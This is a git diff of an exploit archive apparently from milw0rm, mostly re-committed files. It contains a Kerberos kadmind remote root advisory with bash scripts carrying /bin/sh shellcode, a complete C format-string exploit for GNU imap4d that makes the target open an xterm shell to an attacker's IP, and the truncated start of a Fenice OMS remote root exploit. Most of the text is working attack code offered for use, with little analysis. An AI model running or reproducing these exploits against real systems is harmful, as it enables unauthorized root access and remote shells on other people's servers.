vfprintf () from /lib64/libc.so.6 -#3 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6 -#4 0x00002aaaaaabb2ea in klog_vsyslog (priority=5, -format=0x40c4e0 "Request: %s, %s, %s, client=%s, service=%s, addr=%s", arglist=0x7fffbe94f220) -at logger.c:854 -#5 0x6161616161616161 in ?? () -.... - - - -In our vulnerable code we have the function klog_vsyslog, which is a lame attempt to create a custom logger, as we can -see by the result of this advisory. - - -Here is the working exploit: - -#!/bin/bash -ADDIT="get_principal" -ATTACK="cr4yz33_h4xx0r" -KADMIN="kadmin" -KADMINDP="`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print -$4}'| sed -e s/0.0.0.0://`" -PRINCIPAL="root/admin@OPEN-SECURITY.ORG" -TARGET=debauch.open-security.org -TRIGGAH="`perl -e 'print "A" x 900'`PAD`perl -e 'printf "\xc0\xfa\xff\xbf\x88\xf8\xff\xbf" x 20'``perl -e 'print -"C" x 6'``perl -e 'print "\x90" x 50'` -`echo -e "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"`" - -$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q "$ADDIT $TRIGGAH" - -###end - -Reference: -http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=500 - -# milw0rm.com [2007-04-10] +Kerberos Version 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability + + +The Issue: +Remotely exploitable buffer overflow vulnerability in Kerberos kadmind service + +The Versions: +krb5-1.5.1 (Latest version from http://eb.mit.edu/Kerberos/ ) +krb5-server-1.4.3-5.1 (Latest version from Fedora yum update) + +The Environment: +Linux Fedora Core 5 x86_64 bit + +The Overview: + +There is a remotly exploitable overflow bug in Kerberos kadmind service that can be triggered during the administration +of principals via kadmin or kadmin.local and either in a local context or a remote context, which will allow the attacker +the possibility of having Kerberos server yield the permissions of the user that it is running a, usually root. It can +also be used as a denail of service against kadmind. + +root 1834 1 0 22:29 ? 00:00:00 /usr/kerberos/sbin/krb5kdc +root 6600 1 0 23:00 ? 00:00:00 /usr/kerberos/sbin/kadmind + +To trigger the exploit, a valid user account has to first of all authenticate to the Kerberos service and have a ticket +generated, the user therefor must be or have access to an admin account that can access thre remote kadmind +service, which limits the scope of the attack slightly. However, this still allows anyone with the most limited access +to the service to kill it or gain root access and as such should be treated as critical. + +A trivial issue encountered was that the kadmin client would filter out crazy strings passed to it, so you can't use it +by default to send in shellcode and return addresses. To get around that we modify the client source code a bit to +honour our malicious values and then upload it to our user directory, and as if by magic it will no longer bail when it +encounters these strings ;) + + +Following is the vulnerable function with the unused code, ifdefs and comments removed to make it easier to read + +/* krb5-1.5.1/src/lib/kadm5/logger.c + +static int +klog_vsyslog(int priority, const char *format, va_list arglist) +{ +char outbuf[KRB5_KLOG_MAX_ERRMSG_SIZE]; +char *syslogp; + +strncpy(outbuf, ctime(&now) + 4, 15); +cp += 15; + +syslogp = &outbuf[strlen(outbuf)]; + +vsprintf(syslogp, format, arglist); + +*/ + + +By exersizing any of the option presented to us in kadmin, we should be able to trigger this little bug, including: + +add_principal +delete_principal +modify_principal +change_password +get_principal +... and on..... + +Another nice feature to kadmin is that it is possible to run it from the command line, and as such this makes crafting +a payload much easier :) by running the following script, it should be possible to trigger this bug and kill kadmind: + +########## + +#!/bin/bash +ADDIT="get_principal" +ATTACK="cr4yz33_h4xx0r" +KADMIN="/usr/kerberos/sbin/kadmin" +KADMINDP="`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print $4}'| sed -e s/0.0.0.0://`" +PRINCIPAL="root/admin@OPEN-SECURITY.ORG" +TARGET=coredump.open-security.org +TRIGGAH="`perl -e 'print "A" x 5000'`" + +$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q "$ADDIT -pw $ATTACK $TRIGGAH" + +########## + + +After running this script with various sized buffer values, we get faults in the following locations: + +// With 2000 A's // +#0 0x0000003a2ed427d5 in vfprintf () from /lib64/libc.so.6 +#1 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6 +#2 0x00002aaaaaabb2ea in klog_vsyslog (priority=5, +format=0x40c4e0 "Request: %s, %s, %s, client=%s, service=%s, addr=%s", arglist=0x7ffffdb40e60) +at logger.c:854 +#3 0x4141414141414141 in ?? () +#4 0x4141414141414141 in ?? () +#5 0x4141414141414141 in ?? () +.... + + +// With 5000 A's (On the Fedora version) // +#0 0x00002aaaab65fc90 in strlen () from /lib64/libc.so.6 +#1 0x00002aaaab63088b in vfprintf () from /lib64/libc.so.6 +#2 0x00002aaaab6ca8ad in __vsprintf_chk () from /lib64/libc.so.6 +#3 0x00002aaaaabd2283 in krb5_klog_syslog () from /usr/lib64/libkadm5srv.so.5 +#4 0x4141414141414141 in ?? () +#5 0x4141414141414141 in ?? () +.... + + +// With 30000 a's // +#0 0x0000003a2ed750ae in mempcpy () from /lib64/libc.so.6 +#1 0x0000003a2ed69a5b in _IO_default_xsputn_internal () from /lib64/libc.so.6 +#2 0x0000003a2ed44294 in vfprintf () from /lib64/libc.so.6 +#3 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6 +#4 0x00002aaaaaabb2ea in klog_vsyslog (priority=5, +format=0x40c4e0 "Request: %s, %s, %s, client=%s, service=%s, addr=%s", arglist=0x7fffbe94f220) +at logger.c:854 +#5 0x6161616161616161 in ?? () +.... + + + +In our vulnerable code we have the function klog_vsyslog, which is a lame attempt to create a custom logger, as we can +see by the result of this advisory. + + +Here is the working exploit: + +#!/bin/bash +ADDIT="get_principal" +ATTACK="cr4yz33_h4xx0r" +KADMIN="kadmin" +KADMINDP="`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print +$4}'| sed -e s/0.0.0.0://`" +PRINCIPAL="root/admin@OPEN-SECURITY.ORG" +TARGET=debauch.open-security.org +TRIGGAH="`perl -e 'print "A" x 900'`PAD`perl -e 'printf "\xc0\xfa\xff\xbf\x88\xf8\xff\xbf" x 20'``perl -e 'print +"C" x 6'``perl -e 'print "\x90" x 50'` +`echo -e "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"`" + +$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q "$ADDIT $TRIGGAH" + +###end + +Reference: +http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=500 + +# milw0rm.com [2007-04-10] diff --git a/platforms/linux/remote/372.c b/platforms/linux/remote/372.c index 6176f6b74..b09ed0011 100755 --- a/platforms/linux/remote/372.c +++ b/platforms/linux/remote/372.c @@ -290,6 +290,6 @@ close(s); } return retval; -} - -// milw0rm.com [2004-08-03] +} + +// milw0rm.com [2004-08-03] diff --git a/platforms/linux/remote/373.c b/platforms/linux/remote/373.c index 6abf34653..0a6abc068 100755 --- a/platforms/linux/remote/373.c +++ b/platforms/linux/remote/373.c @@ -304,6 +304,6 @@ int main(int argc, char **argv) shell(args.host, SHELL_PORT); return 0; -} - -// milw0rm.com [2004-08-04] +} + +// milw0rm.com [2004-08-04] diff --git a/platforms/linux/remote/3787.c b/platforms/linux/remote/3787.c index 5f41f8c15..f61209e72 100755 --- a/platforms/linux/remote/3787.c +++ b/platforms/linux/remote/3787.c @@ -1,366 +1,366 @@ -/* -** -** Fedora Core 6 (exec-shield) based -** GNU imap4d mailutils-0.6 search remote format string exploit -** by Xpl017Elz -** -** Advanced exploitation in exec-shield (Fedora Core case study) -** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt -** -** Reference: http://www.securityfocus.com/bid/14794 (2005/09/09) -** http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=303 -** -** -- -** exploit by "you dong-hun"(Xpl017Elz), . -** My World: http://x82.inetcop.org -** -*/ -/* -** -=-= POINT! POINT! POINT! POINT! POINT! =-=- -** -** This vulnerability is one of the normal exploitation case under exec-shield. -** GNU imap4d can be run as a standalone deamon by using -d option and it inherits -** virtual address of parent process which mapped randomly. -** -** [root@localhost .libs]# ps -ef | grep imap4d | grep -v grep -** root 8312 1 0 20:01 ? 00:00:00 ./lt-imap4d -d -** [root@localhost .libs]# -** -** These are keys to get over some possible problems. -** -** * `One shot' exploit without brute-forcing. -** -** Sometimes you man need to do some brute-forcing to assume the library address -** which is mapped randomly. But this is not my recommendation. -** -** Because it is a format string attack, we can possibly get the ramdom address -** of the library. Using this technique, I could find exploitable do_system() -** address at once. but, unfortunately, it is not applicable to blind format string -** exploit by syslog(). -** -** * How to execute a remote shell. -** -** I decided to use xterm for this, but if sadly, there is no xterm on the target -** server then you should look for another way. because of the variableness -** of size of IP address, I felt a need for fitting the address within 10 bytes. -** -** Hacker's IP address would be a perfect demical numbers and it makes size -** of IP address same and shortens the string to overwrite. -** -** xterm exploit code includes do_system() address can be writen in 136 bytes -** of general exploit code. -** -*/ - -#include -#include -#include -#include -#include -#include - -#define DEF_STR "x0x" -#define PORT 143 - -#define DF_SFLAG 11 -#define DF_OFFSET 29 -#define DTOR_END_ADDR 0x08059268 -#define DO_SYSTEM 0x828282 -#define SHELL 0x3b6873 -#define DEF_DO_SYSTEM_OFFSET 0x1fbf9 -#define GET_DO_SYSTEM_SFLAG 38 - -#define XHOST_IP "82.82.82.82" - -void banrl(); -void usage(); -void re_connt(int sock); -int setsock(char *host,int port); - - -long xterm_shell[]={ // do_system("xterm -di ip_addr"); - 0x7478,0x7265, - 0x206d,0x642d, - 0x2069,0x4141, /* IP address */ - 0x4141,0x4141, - 0x4141,0x4141, - 0x303a,0x0000 -}; -int xterm_ip_count=5; - - -int get_10_ip(char *ipbuf){ - char tbuf[32]; - int i=0; - unsigned long ip,ip1,ip2,ip3,ip4; - ip=ip1=ip2=ip3=ip4; - - sscanf(ipbuf,"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4); -#define IP1 16777216 -#define IP2 65536 -#define IP3 256 - ip=0; - ip+=ip1 * (IP1); - ip+=ip2 * (IP2); - ip+=ip3 * (IP3); - ip+=ip4; - - memset((char *)ipbuf,0,256); - sprintf(ipbuf,"%lu",ip); - xterm_ip_count=5; - - for(i=0;i<10;i+=2){ - memset((char *)tbuf,0,sizeof(tbuf)); - snprintf(tbuf,sizeof(tbuf)-1,"0x%02x%02x",ipbuf[i+1],ipbuf[i]); - - ip=strtoul(tbuf,NULL,0); - xterm_shell[xterm_ip_count++]=ip; - } - return 0; -} - -int send_exploit_code(int sock,unsigned long retloc,unsigned long retaddr,int sflag){ - char buf[1024]; - int i=0; - - memset((char *)buf,0,sizeof(buf)); - snprintf(buf,sizeof(buf)-1,"1 search topic x"); - i=strlen(buf); - *(long *)&buf[i]=retloc; - i+=4; - if(retaddr==0){ - retaddr+=0x10000; - } - sprintf(buf+i,"%%%lux%%%d$n\n",retaddr-i-DF_OFFSET,sflag); - - send(sock,buf,strlen(buf),0); - memset(buf,0,sizeof(buf)); - while(recv(sock,buf,sizeof(buf)-1,0)){ - if(strstr(buf,")")){ - break; - } - } - return 0; -} - -int main(int argc,char *argv[]){ - int sflag=DF_SFLAG; - unsigned long do_system_addr=DO_SYSTEM; - unsigned long retloc=DTOR_END_ADDR; - unsigned long shaddr=SHELL; - char host[256]=DEF_STR; - int port=PORT; - extern char *optarg; - int sock,i,r=0; - char buf[1024]; - char user[256]=DEF_STR; - char pass[256]=DEF_STR; - char *ptr=NULL; - char xhost_ip_buf[256]=XHOST_IP; - - get_10_ip(xhost_ip_buf); - - memset((char *)buf,0,sizeof(buf)); - memset((char *)user,0,sizeof(user)); - memset((char *)pass,0,sizeof(pass)); - - (void)banrl(); - while((sock=getopt(argc,argv,"R:r:D:d:H:h:P:p:F:f:I:i:U:u:S:s:"))!=EOF){ - switch(sock){ - case 'R': - case 'r': - retloc=strtoul(optarg,NULL,0); - break; - case 'D': - case 'd': - do_system_addr=strtoul(optarg,NULL,0); - break; - case 'H': - case 'h': - memset((char *)host,0,sizeof(host)); - strncpy(host,optarg,sizeof(host)-1); - break; - case 'P': - case 'p': - port=atoi(optarg); - break; - case 'F': - case 'f': - sflag=atoi(optarg); - break; - case 'I': - case 'i': - memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf)); - strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1); - get_10_ip(xhost_ip_buf); - break; - case 'U': - case 'u': - memset((char *)user,0,sizeof(user)); - strncpy(user,optarg,sizeof(user)-1); - break; - case 'S': - case 's': - memset((char *)pass,0,sizeof(pass)); - strncpy(pass,optarg,sizeof(pass)-1); - break; - case '?': - default: - (void)usage(argv[0]); - break; - } - } - if(!strcmp(host,DEF_STR)||!strcmp(user,DEF_STR)||!strcmp(pass,DEF_STR)){ - (void)usage(argv[0]); - } - - fprintf(stdout," [+] make socket.\n"); - fprintf(stdout," [+] host: %s.\n",host); - fprintf(stdout," [+] port: %d.\n",port); - sock=setsock(host,port); - re_connt(sock); - - recv(sock,buf,sizeof(buf)-1,0); - if(strstr(buf,"IMAP4rev1")){ - fprintf(stdout," [+] OK, IMAP4rev1.\n"); - } - else { - fprintf(stdout," [-] Ooops, no match.\n\n"); - close(sock); - exit(-1); - } - - memset((char *)buf,0,sizeof(buf)); - snprintf(buf,sizeof(buf)-1,"1 login \"%s\" \"%s\"\n",user,pass); - send(sock,buf,strlen(buf),0); - memset((char *)buf,0,sizeof(buf)); - while(recv(sock,buf,sizeof(buf)-1,0)){ - if(strstr(buf," Completed")){ - fprintf(stdout," [+] login completed.\n"); - break; - } - else if(strstr(buf," rejected")){ - fprintf(stdout," [-] login failed.\n\n"); - exit(-1); - } - } - - memset((char *)buf,0,sizeof(buf)); - snprintf(buf,sizeof(buf)-1,"1 select \"inbox\"\n"); - send(sock,buf,strlen(buf),0); - memset((char *)buf,0,sizeof(buf)); - while(recv(sock,buf,sizeof(buf)-1,0)){ - if(strstr(buf," Completed")){ - fprintf(stdout," [+] select success.\n"); - break; - } - else if(strstr(buf," NO SELECT")){ - fprintf(stdout," [-] select failed.\n\n"); - exit(-1); - } - } - - - /* get, do_system address */ - fprintf(stdout," [+] find do_system address.\n"); - memset((char *)buf,0,sizeof(buf)); - snprintf(buf,sizeof(buf)-1,"1 search topic |%%%d$x|\n",GET_DO_SYSTEM_SFLAG); - send(sock,buf,strlen(buf),0); - memset((char *)buf,0,sizeof(buf)); - recv(sock,buf,sizeof(buf)-1,0); - if(strstr(buf,"|")){ - ptr=(char *)strstr(buf,"|"); - sscanf(ptr,"|%x|\n",&do_system_addr); - } - do_system_addr-=DEF_DO_SYSTEM_OFFSET; - - fprintf(stdout," [+] make exploit code.\n"); - fprintf(stdout," [+] retloc address: %p.\n",retloc); - fprintf(stdout," [+] do_system address: %p.\n",do_system_addr); - fprintf(stdout," [+] send exploit code.\n"); - - send_exploit_code(sock,retloc,do_system_addr,sflag); - for(i=0,r=4;i<(sizeof(xterm_shell)/4);i++,r+=2){ - send_exploit_code(sock,retloc+r,xterm_shell[i],sflag); - } - - -#define LOGOUT_CMD "1 logout\n" - send(sock,LOGOUT_CMD,strlen(LOGOUT_CMD),0); - sleep(1); - - recv(sock,buf,sizeof(buf)-1,0); - close(sock); - - if(strstr(buf,"BYE")&&strstr(buf,"LOGOUT")){ - fprintf(stdout," [+] logout success.\n\n"); - } - else { - fprintf(stdout," [-] logout failed.\n\n"); - exit(-1); - } - exit(0); -} - -void banrl(){ - fprintf(stdout,"\n FC6 (exec-shield) based GNU imap4d mailutils-0.6 search remote exploit\n"); - fprintf(stdout," by Xpl017Elz\n\n"); -} - -void usage(char *arg0){ - fprintf(stdout," Usage: %s -options arguments\n\n",arg0); - - fprintf(stdout,"\t-r [retloc] - .dtors address (default: %p).\n",DTOR_END_ADDR); - fprintf(stdout,"\t-d [do_system] - do_system address (auto).\n"); - fprintf(stdout,"\t-h [host] - target hostname or ip.\n"); - fprintf(stdout,"\t-p [port] - target port number (auto).\n"); - fprintf(stdout,"\t-f [sflag] - $-flag number (default: 11).\n"); - fprintf(stdout,"\t-i [ip] - attacker xhost ip.\n"); - fprintf(stdout,"\t-u [user] - imap user id.\n"); - fprintf(stdout,"\t-s [pass] - imap user pass.\n"); - fprintf(stdout,"\t-? - help information.\n\n"); - - fprintf(stdout," Example: %s -hhost -iattacker -ux82 -spass\n\n",arg0); - exit(-1); -} - - -void re_connt(int sock){ - if(sock==-1) - { - fprintf(stdout," [-] Failed.\n\n"); - exit(-1); - } -} - -int setsock(char *host,int port) -{ - int sock; - struct hostent *he; - struct sockaddr_in x82_addr; - - if((he=gethostbyname(host))==NULL) - { - return(-1); - } - - if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF) - { - return(-1); - } - - x82_addr.sin_family=AF_INET; - x82_addr.sin_port=htons(port); - x82_addr.sin_addr=*((struct in_addr *)he->h_addr); - bzero(&(x82_addr.sin_zero),8); - - if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF) - { - return(-1); - } - return(sock); -} - -/* eoc */ - -// milw0rm.com [2007-04-24] +/* +** +** Fedora Core 6 (exec-shield) based +** GNU imap4d mailutils-0.6 search remote format string exploit +** by Xpl017Elz +** +** Advanced exploitation in exec-shield (Fedora Core case study) +** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt +** +** Reference: http://www.securityfocus.com/bid/14794 (2005/09/09) +** http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=303 +** +** -- +** exploit by "you dong-hun"(Xpl017Elz), . +** My World: http://x82.inetcop.org +** +*/ +/* +** -=-= POINT! POINT! POINT! POINT! POINT! =-=- +** +** This vulnerability is one of the normal exploitation case under exec-shield. +** GNU imap4d can be run as a standalone deamon by using -d option and it inherits +** virtual address of parent process which mapped randomly. +** +** [root@localhost .libs]# ps -ef | grep imap4d | grep -v grep +** root 8312 1 0 20:01 ? 00:00:00 ./lt-imap4d -d +** [root@localhost .libs]# +** +** These are keys to get over some possible problems. +** +** * `One shot' exploit without brute-forcing. +** +** Sometimes you man need to do some brute-forcing to assume the library address +** which is mapped randomly. But this is not my recommendation. +** +** Because it is a format string attack, we can possibly get the ramdom address +** of the library. Using this technique, I could find exploitable do_system() +** address at once. but, unfortunately, it is not applicable to blind format string +** exploit by syslog(). +** +** * How to execute a remote shell. +** +** I decided to use xterm for this, but if sadly, there is no xterm on the target +** server then you should look for another way. because of the variableness +** of size of IP address, I felt a need for fitting the address within 10 bytes. +** +** Hacker's IP address would be a perfect demical numbers and it makes size +** of IP address same and shortens the string to overwrite. +** +** xterm exploit code includes do_system() address can be writen in 136 bytes +** of general exploit code. +** +*/ + +#include +#include +#include +#include +#include +#include + +#define DEF_STR "x0x" +#define PORT 143 + +#define DF_SFLAG 11 +#define DF_OFFSET 29 +#define DTOR_END_ADDR 0x08059268 +#define DO_SYSTEM 0x828282 +#define SHELL 0x3b6873 +#define DEF_DO_SYSTEM_OFFSET 0x1fbf9 +#define GET_DO_SYSTEM_SFLAG 38 + +#define XHOST_IP "82.82.82.82" + +void banrl(); +void usage(); +void re_connt(int sock); +int setsock(char *host,int port); + + +long xterm_shell[]={ // do_system("xterm -di ip_addr"); + 0x7478,0x7265, + 0x206d,0x642d, + 0x2069,0x4141, /* IP address */ + 0x4141,0x4141, + 0x4141,0x4141, + 0x303a,0x0000 +}; +int xterm_ip_count=5; + + +int get_10_ip(char *ipbuf){ + char tbuf[32]; + int i=0; + unsigned long ip,ip1,ip2,ip3,ip4; + ip=ip1=ip2=ip3=ip4; + + sscanf(ipbuf,"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4); +#define IP1 16777216 +#define IP2 65536 +#define IP3 256 + ip=0; + ip+=ip1 * (IP1); + ip+=ip2 * (IP2); + ip+=ip3 * (IP3); + ip+=ip4; + + memset((char *)ipbuf,0,256); + sprintf(ipbuf,"%lu",ip); + xterm_ip_count=5; + + for(i=0;i<10;i+=2){ + memset((char *)tbuf,0,sizeof(tbuf)); + snprintf(tbuf,sizeof(tbuf)-1,"0x%02x%02x",ipbuf[i+1],ipbuf[i]); + + ip=strtoul(tbuf,NULL,0); + xterm_shell[xterm_ip_count++]=ip; + } + return 0; +} + +int send_exploit_code(int sock,unsigned long retloc,unsigned long retaddr,int sflag){ + char buf[1024]; + int i=0; + + memset((char *)buf,0,sizeof(buf)); + snprintf(buf,sizeof(buf)-1,"1 search topic x"); + i=strlen(buf); + *(long *)&buf[i]=retloc; + i+=4; + if(retaddr==0){ + retaddr+=0x10000; + } + sprintf(buf+i,"%%%lux%%%d$n\n",retaddr-i-DF_OFFSET,sflag); + + send(sock,buf,strlen(buf),0); + memset(buf,0,sizeof(buf)); + while(recv(sock,buf,sizeof(buf)-1,0)){ + if(strstr(buf,")")){ + break; + } + } + return 0; +} + +int main(int argc,char *argv[]){ + int sflag=DF_SFLAG; + unsigned long do_system_addr=DO_SYSTEM; + unsigned long retloc=DTOR_END_ADDR; + unsigned long shaddr=SHELL; + char host[256]=DEF_STR; + int port=PORT; + extern char *optarg; + int sock,i,r=0; + char buf[1024]; + char user[256]=DEF_STR; + char pass[256]=DEF_STR; + char *ptr=NULL; + char xhost_ip_buf[256]=XHOST_IP; + + get_10_ip(xhost_ip_buf); + + memset((char *)buf,0,sizeof(buf)); + memset((char *)user,0,sizeof(user)); + memset((char *)pass,0,sizeof(pass)); + + (void)banrl(); + while((sock=getopt(argc,argv,"R:r:D:d:H:h:P:p:F:f:I:i:U:u:S:s:"))!=EOF){ + switch(sock){ + case 'R': + case 'r': + retloc=strtoul(optarg,NULL,0); + break; + case 'D': + case 'd': + do_system_addr=strtoul(optarg,NULL,0); + break; + case 'H': + case 'h': + memset((char *)host,0,sizeof(host)); + strncpy(host,optarg,sizeof(host)-1); + break; + case 'P': + case 'p': + port=atoi(optarg); + break; + case 'F': + case 'f': + sflag=atoi(optarg); + break; + case 'I': + case 'i': + memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf)); + strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1); + get_10_ip(xhost_ip_buf); + break; + case 'U': + case 'u': + memset((char *)user,0,sizeof(user)); + strncpy(user,optarg,sizeof(user)-1); + break; + case 'S': + case 's': + memset((char *)pass,0,sizeof(pass)); + strncpy(pass,optarg,sizeof(pass)-1); + break; + case '?': + default: + (void)usage(argv[0]); + break; + } + } + if(!strcmp(host,DEF_STR)||!strcmp(user,DEF_STR)||!strcmp(pass,DEF_STR)){ + (void)usage(argv[0]); + } + + fprintf(stdout," [+] make socket.\n"); + fprintf(stdout," [+] host: %s.\n",host); + fprintf(stdout," [+] port: %d.\n",port); + sock=setsock(host,port); + re_connt(sock); + + recv(sock,buf,sizeof(buf)-1,0); + if(strstr(buf,"IMAP4rev1")){ + fprintf(stdout," [+] OK, IMAP4rev1.\n"); + } + else { + fprintf(stdout," [-] Ooops, no match.\n\n"); + close(sock); + exit(-1); + } + + memset((char *)buf,0,sizeof(buf)); + snprintf(buf,sizeof(buf)-1,"1 login \"%s\" \"%s\"\n",user,pass); + send(sock,buf,strlen(buf),0); + memset((char *)buf,0,sizeof(buf)); + while(recv(sock,buf,sizeof(buf)-1,0)){ + if(strstr(buf," Completed")){ + fprintf(stdout," [+] login completed.\n"); + break; + } + else if(strstr(buf," rejected")){ + fprintf(stdout," [-] login failed.\n\n"); + exit(-1); + } + } + + memset((char *)buf,0,sizeof(buf)); + snprintf(buf,sizeof(buf)-1,"1 select \"inbox\"\n"); + send(sock,buf,strlen(buf),0); + memset((char *)buf,0,sizeof(buf)); + while(recv(sock,buf,sizeof(buf)-1,0)){ + if(strstr(buf," Completed")){ + fprintf(stdout," [+] select success.\n"); + break; + } + else if(strstr(buf," NO SELECT")){ + fprintf(stdout," [-] select failed.\n\n"); + exit(-1); + } + } + + + /* get, do_system address */ + fprintf(stdout," [+] find do_system address.\n"); + memset((char *)buf,0,sizeof(buf)); + snprintf(buf,sizeof(buf)-1,"1 search topic |%%%d$x|\n",GET_DO_SYSTEM_SFLAG); + send(sock,buf,strlen(buf),0); + memset((char *)buf,0,sizeof(buf)); + recv(sock,buf,sizeof(buf)-1,0); + if(strstr(buf,"|")){ + ptr=(char *)strstr(buf,"|"); + sscanf(ptr,"|%x|\n",&do_system_addr); + } + do_system_addr-=DEF_DO_SYSTEM_OFFSET; + + fprintf(stdout," [+] make exploit code.\n"); + fprintf(stdout," [+] retloc address: %p.\n",retloc); + fprintf(stdout," [+] do_system address: %p.\n",do_system_addr); + fprintf(stdout," [+] send exploit code.\n"); + + send_exploit_code(sock,retloc,do_system_addr,sflag); + for(i=0,r=4;i<(sizeof(xterm_shell)/4);i++,r+=2){ + send_exploit_code(sock,retloc+r,xterm_shell[i],sflag); + } + + +#define LOGOUT_CMD "1 logout\n" + send(sock,LOGOUT_CMD,strlen(LOGOUT_CMD),0); + sleep(1); + + recv(sock,buf,sizeof(buf)-1,0); + close(sock); + + if(strstr(buf,"BYE")&&strstr(buf,"LOGOUT")){ + fprintf(stdout," [+] logout success.\n\n"); + } + else { + fprintf(stdout," [-] logout failed.\n\n"); + exit(-1); + } + exit(0); +} + +void banrl(){ + fprintf(stdout,"\n FC6 (exec-shield) based GNU imap4d mailutils-0.6 search remote exploit\n"); + fprintf(stdout," by Xpl017Elz\n\n"); +} + +void usage(char *arg0){ + fprintf(stdout," Usage: %s -options arguments\n\n",arg0); + + fprintf(stdout,"\t-r [retloc] - .dtors address (default: %p).\n",DTOR_END_ADDR); + fprintf(stdout,"\t-d [do_system] - do_system address (auto).\n"); + fprintf(stdout,"\t-h [host] - target hostname or ip.\n"); + fprintf(stdout,"\t-p [port] - target port number (auto).\n"); + fprintf(stdout,"\t-f [sflag] - $-flag number (default: 11).\n"); + fprintf(stdout,"\t-i [ip] - attacker xhost ip.\n"); + fprintf(stdout,"\t-u [user] - imap user id.\n"); + fprintf(stdout,"\t-s [pass] - imap user pass.\n"); + fprintf(stdout,"\t-? - help information.\n\n"); + + fprintf(stdout," Example: %s -hhost -iattacker -ux82 -spass\n\n",arg0); + exit(-1); +} + + +void re_connt(int sock){ + if(sock==-1) + { + fprintf(stdout," [-] Failed.\n\n"); + exit(-1); + } +} + +int setsock(char *host,int port) +{ + int sock; + struct hostent *he; + struct sockaddr_in x82_addr; + + if((he=gethostbyname(host))==NULL) + { + return(-1); + } + + if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF) + { + return(-1); + } + + x82_addr.sin_family=AF_INET; + x82_addr.sin_port=htons(port); + x82_addr.sin_addr=*((struct in_addr *)he->h_addr); + bzero(&(x82_addr.sin_zero),8); + + if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF) + { + return(-1); + } + return(sock); +} + +/* eoc */ + +// milw0rm.com [2007-04-24] diff --git a/platforms/linux/remote/379.txt b/platforms/linux/remote/379.txt index c8fda87c1..b04474ad1 100755 --- a/platforms/linux/remote/379.txt +++ b/platforms/linux/remote/379.txt @@ -1,3 +1,3 @@ -filediff?f=CVSROOT/rcsinfo&v1=1.1&v2=1.2;last; - -# milw0rm.com [2004-08-06] +filediff?f=CVSROOT/rcsinfo&v1=1.1&v2=1.2;last; + +# milw0rm.com [2004-08-06] diff --git a/platforms/linux/remote/380.c b/platforms/linux/remote/380.c index dc5a37149..3d30b334c 100755 --- a/platforms/linux/remote/380.c +++ b/platforms/linux/remote/380.c @@ -313,6 +313,6 @@ int main(int argc, char **argv) return EXIT_SUCCESS; } - - -// milw0rm.com [2004-08-08] + + +// milw0rm.com [2004-08-08] diff --git a/platforms/linux/remote/3815.c b/platforms/linux/remote/3815.c index dab6d7d45..e48a39582 100755 --- a/platforms/linux/remote/3815.c +++ b/platforms/linux/remote/3815.c @@ -1,370 +1,370 @@ -/* -** -** Fedora Core 6 (exec-shield) based -** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit -** by Xpl017Elz -** -** Advanced exploitation in exec-shield (Fedora Core case study) -** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt -** -** Reference: http://www.securityfocus.com/bid/17678 -** vendor: http://streaming.polito.it/legacy_server -** -** -- -** exploit by "you dong-hun"(Xpl017Elz), . -** My World: http://x82.inetcop.org -** -*/ -/* -** -=-= POINT! POINT! POINT! POINT! POINT! =-=- -** -** This is a very common standalone daemon remote buffer overflow vulnerability. -** I used the method that I used on my proftpd exploit again to avoid random mapping library. -** And I'm plainning to publish it in English. -** -** http://x82.inetcop.org/h0me/papers/FC_exploit/FC_oneshot_exploit.txt -** -** Kaveh Razavi's exploit uses about 750Kb and mine uses 115Kb more. -** -*/ - -#include -#include -#include -#include -#include -#include - - -#define UNAME_PLT 0x8048e9c // // randomÇÏ°Ô mappingµÇ´Â (execle()>>16)&0xff GOT 1byte¸¦ È®º¸Çϱâ À§ÇØ - -#define STRCPY_PLT 0x08048ffc // -#define MOVE_ESP 0x80569e5 // <__do_global_ctors_aux+37>: pop %ebx // retÀ» Æ÷ÇÔ ÃÑ 12byte À̵¿ (nergal's idea) - -#define GETGID_GOT 0x8059234 // execle() ÇÔ¼ö ÁÖ¼Ò¸¦ ÀÓÀÇ·Î Á¶ÇÕÇÏ¿© ³ÖÀ» GOT ÁÖ¼Ò -/* - (gdb) x/x 0x8059234 - 0x8059234 <_GLOBAL_OFFSET_TABLE_+324>: 0x08049222 - (gdb) x 0x08049222 - 0x8049222 : 0x00027068 - (gdb) -*/ -#define GETGID_PLT 0x0804921c // // GOT Á¶ÇÕ ÀÌÈÄ, PLT¸¦ ÅëÇØ execle() ÇÔ¼ö Çڵ鸵 - - -#define EXECLE_16_0xff 0x8059156 // (execle()>>16)&0xff // uname ÇÔ¼öÀÇ 1byte: 0x!!0000 -#define EXECLE_08_0xff 